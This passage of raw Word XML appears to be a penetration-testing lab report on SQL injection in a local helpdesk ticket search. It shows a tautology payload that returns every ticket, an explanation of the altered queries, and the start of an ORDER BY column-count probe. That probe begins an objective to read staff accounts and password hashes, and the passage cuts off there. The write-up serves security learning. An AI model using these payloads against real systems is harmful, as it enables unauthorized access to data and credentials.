              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25CB71AD" w14:textId="2EE5C8D5" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="001B6D66">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>comments out the remaining portion of the original query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D251B5F" w14:textId="77777777" w:rsidR="00205E75" w:rsidRDefault="005F5467" w:rsidP="00205E75">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005F5467">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2704E3D3" wp14:editId="1B153F67">
            <wp:extent cx="6858000" cy="2913380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1051551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551876" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2913380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D725CFB" w14:textId="48748E48" w:rsidR="005F5467" w:rsidRPr="001B6D66" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 1.3.3: Burp request with the payload and render response showing Attachment-related ticket title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5CE46C" w14:textId="2E6CD750" w:rsidR="00E12E7D" w:rsidRDefault="005F5467" w:rsidP="005F5467">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.4 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D902BD" w14:textId="78B963CB" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="001B6D66">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The q parameter is vulnerable to SQL injection. User input is concatenated directly into a SQL LIKE clause, allowing an attacker to alter the query logic and retrieve ticket records not returned by a normal search. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722E029F" w14:textId="2B90A3DE" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="001B6D66">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The likely resulting query structure is:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5467" w14:paraId="710B9641" w14:textId="77777777" w:rsidTr="005F5467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7B0DA0C3" w14:textId="77777777" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="005F5467">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>SELECT id, title, submitter_email, status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54DD531F" w14:textId="77777777" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="005F5467">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>FROM helpdesk_ticket</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F96A383" w14:textId="6DFDD826" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="005F5467">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>WHERE title LIKE ‘%&lt;q&gt;%’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="696CF9EC" w14:textId="5D6BE02F" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="005F5467">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>When the payload is supplied, the query effectively becomes similar to:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5467" w14:paraId="29B15128" w14:textId="77777777" w:rsidTr="005F5467">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="22CC15FA" w14:textId="77777777" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="005F5467">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>SELECT id, title, submitter_email, status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A73ED9E" w14:textId="77777777" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="005F5467">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>FROM helpdesk_ticket</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C6F790D" w14:textId="3CB4A8CE" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="005F5467">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>WHERE title LIKE ‘%zzzz’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4701C362" w14:textId="79BF6A4D" w:rsidR="005F5467" w:rsidRDefault="005F5467" w:rsidP="005F5467">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>OR title LIKE ‘%Attachment%’ -- %’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6292DC16" w14:textId="2E8F15A6" w:rsidR="00E12E7D" w:rsidRDefault="005F5467" w:rsidP="005F5467">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This confirms that the attacker-controlled input modifies the SQL WHERE condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC2EF5" w14:textId="49ED32D9" w:rsidR="005F5467" w:rsidRDefault="00AD40BF" w:rsidP="00AD40BF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD40BF">
        <w:t xml:space="preserve">Objective 2: </w:t>
      </w:r>
      <w:r w:rsidR="004A4D58">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD40BF">
        <w:t xml:space="preserve">eturn </w:t>
      </w:r>
      <w:r w:rsidR="001221CA">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD40BF">
        <w:t xml:space="preserve">ll </w:t>
      </w:r>
      <w:r w:rsidR="001221CA">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD40BF">
        <w:t xml:space="preserve">ickets </w:t>
      </w:r>
      <w:r w:rsidR="001221CA">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD40BF">
        <w:t xml:space="preserve">ith </w:t>
      </w:r>
      <w:r w:rsidR="001221CA">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD40BF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001221CA">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD40BF">
        <w:t>autology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE5E2EF" w14:textId="5745088E" w:rsidR="00AD40BF" w:rsidRDefault="008F3828" w:rsidP="008F3828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Target</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F3828" w14:paraId="486E0AAF" w14:textId="77777777" w:rsidTr="008F3828">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="183871AF" w14:textId="08BD00C9" w:rsidR="008F3828" w:rsidRDefault="008F3828" w:rsidP="00AD40BF">
            <w:r>
              <w:t>http://127.0.0.1:5001/tickets/search/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B14514F" w14:textId="5DD0B519" w:rsidR="008F3828" w:rsidRDefault="008F3828" w:rsidP="008F3828">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Baseline/Control Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3CB32A" w14:textId="77777777" w:rsidR="008F3828" w:rsidRDefault="008F3828" w:rsidP="008F3828">
      <w:r>
        <w:t>I submitted a random search term that should not match any ticket:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F3828" w14:paraId="48535C78" w14:textId="77777777" w:rsidTr="008F3828">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="46626898" w14:textId="305FC2A7" w:rsidR="008F3828" w:rsidRDefault="008F3828" w:rsidP="008F3828">
            <w:r>
              <w:t>q=ziadtestticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73CE6E6B" w14:textId="77777777" w:rsidR="008F3828" w:rsidRDefault="008F3828" w:rsidP="00205E75">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The application returned 0 matches. This established a control case where the search term itself did not match any ticket title.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EB31A8" w14:textId="1823EADF" w:rsidR="008F3828" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Tautology Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E48840" w14:textId="77777777" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:r>
        <w:t>I submitted the following payload in the vulnerable q parameter:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00205E75" w14:paraId="189C197D" w14:textId="77777777" w:rsidTr="00205E75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="715658DD" w14:textId="5ABDF3F1" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
            <w:r>
              <w:t>q=zzzz’+OR+1=1--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="393F28B1" w14:textId="77777777" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The application returned 8 matches, which corresponded to every ticket visible in the search result table. The initial value, zzzz, is not expected to match any ticket. The injected condition '1'='1' is always true, so the WHERE clause no longer filters by the original title search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2464A1CB" w14:textId="77777777" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00205E75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E2031BC" wp14:editId="37221DE7">
            <wp:extent cx="6858000" cy="2918460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1124485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485469" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2918460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D96D37F" w14:textId="01D9C6EA" w:rsidR="008F3828" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 2.3: Search response returned by the tautology payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B9459" w14:textId="468551BE" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7780C4EC" w14:textId="65FC2DB7" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:r>
        <w:t>The likely original query structure is:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00205E75" w14:paraId="68EF7F2B" w14:textId="77777777" w:rsidTr="00205E75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7D1A45FD" w14:textId="77777777" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>SELECT id, title, submitter_email, status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66564FBF" w14:textId="77777777" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
            <w:r>
              <w:t>FROM helpdesk_ticket</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D0160E7" w14:textId="0AEDFC8C" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
            <w:r>
              <w:t>WHERE title LIKE ‘%&lt;q&gt;%’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4947FC94" w14:textId="581BBCE5" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="0083121F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t>With the tautology payload, the query effectively becomes similar to:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="00205E75" w14:paraId="0D4979E2" w14:textId="77777777" w:rsidTr="00205E75">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0129C32E" w14:textId="77777777" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
            <w:r>
              <w:t>SELECT id, title, submitter_email, status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A3172B6" w14:textId="77777777" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
            <w:r>
              <w:t>FROM helpdesk_ticket</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D42F8A3" w14:textId="079C103F" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
            <w:r>
              <w:t>WHERE title LIKE ‘%zzzz’ OR 1=1-- %’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B584F35" w14:textId="51366BDB" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="0083121F">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t>Because 1=1 is true for every row, the database returns all ticket records instead of only records whose titles match the search term. The trailing comment sequence, --, removes the remainder of the original LIKE pattern so the injected SQL remains syntactically valid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E25BD3" w14:textId="736FB2CA" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2F92C1" w14:textId="09809B22" w:rsidR="00205E75" w:rsidRDefault="00205E75" w:rsidP="00205E75">
      <w:r>
        <w:t>Objective 2 was achieved. The q parameter can be used to inject a tautology into the SQL WHERE clause, causing the search endpoint to return all tickets at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9413B" w14:textId="76888CCA" w:rsidR="00205E75" w:rsidRDefault="00D83108" w:rsidP="00D83108">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Objective 3:</w:t>
      </w:r>
      <w:r w:rsidR="004A4D58">
        <w:t xml:space="preserve"> Read </w:t>
      </w:r>
      <w:r w:rsidR="001221CA">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="004A4D58">
        <w:t xml:space="preserve">taff </w:t>
      </w:r>
      <w:r w:rsidR="001221CA">
        <w:t>Accounts</w:t>
      </w:r>
      <w:r w:rsidR="004A4D58">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="001221CA">
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="004A4D58">
        <w:t xml:space="preserve">assword </w:t>
      </w:r>
      <w:r w:rsidR="001221CA">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="004A4D58">
        <w:t>ashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C3C23" w14:textId="4A38B45D" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F11FE69" w14:textId="77777777" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:r>
        <w:t>The target was the same staff ticket search feature used in Objectives 1 and 2:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="004A4D58" w14:paraId="5707E2D8" w14:textId="77777777" w:rsidTr="007956BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="391789A2" w14:textId="06FFB561" w:rsidR="004A4D58" w:rsidRPr="00E12E7D" w:rsidRDefault="004A4D58" w:rsidP="007956BD">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00E12E7D">
              <w:t>http://127.0.0.1:5001</w:t>
            </w:r>
            <w:r>
              <w:t>/tickets/search</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E3A876B" w14:textId="7DC5C91D" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t>For this objective, the goal was to use the SQL injection in the q parameter to read account data that the ticket search was not intended to expose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9E402B" w14:textId="4F4D942E" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 Baseline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2774560B" w14:textId="77777777" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:r>
        <w:t>I kept the same negative control approach from the previous objectives. I submitted a random search term that should not match any ticket:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="004A4D58" w14:paraId="5A7AFCC9" w14:textId="77777777" w:rsidTr="007956BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="76880028" w14:textId="23A10A13" w:rsidR="004A4D58" w:rsidRPr="00E12E7D" w:rsidRDefault="004A4D58" w:rsidP="007956BD">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q=ziadtestticket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EF3FBE4" w14:textId="30589709" w:rsidR="004A4D58" w:rsidRPr="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="004A4D58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00762AF6">
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>he normal search did not expose staff account information. This confirmed that any staff usernames or password hashes returned later came from the injected SQL, not from a normal ticket search result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF65D25" w14:textId="696EE306" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 Column Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C4A47F" w14:textId="77777777" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:r>
        <w:t>I first determined how many columns were in the original SELECT statement by increasing the ORDER BY value until the query failed:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="004A4D58" w14:paraId="33F35D72" w14:textId="77777777" w:rsidTr="007956BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5000" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2781A713" w14:textId="22F987D5" w:rsidR="004A4D58" w:rsidRPr="00E12E7D" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2269"/>
              </w:tabs>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>q=zzzz’+ORDER+BY+4--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="372DE4AA" w14:textId="77777777" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00C16241">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="366FC15B" wp14:editId="567A3678">
            <wp:extent cx="6771736" cy="4135775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="685635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635770" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6773668" cy="4136955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557BAF9" w14:textId="76CB0E94" w:rsidR="004A4D58" w:rsidRDefault="004A4D58" w:rsidP="004A4D58">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure 3.3a: Burp request with ORDER BY 4 returning HTTP 200 OK</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
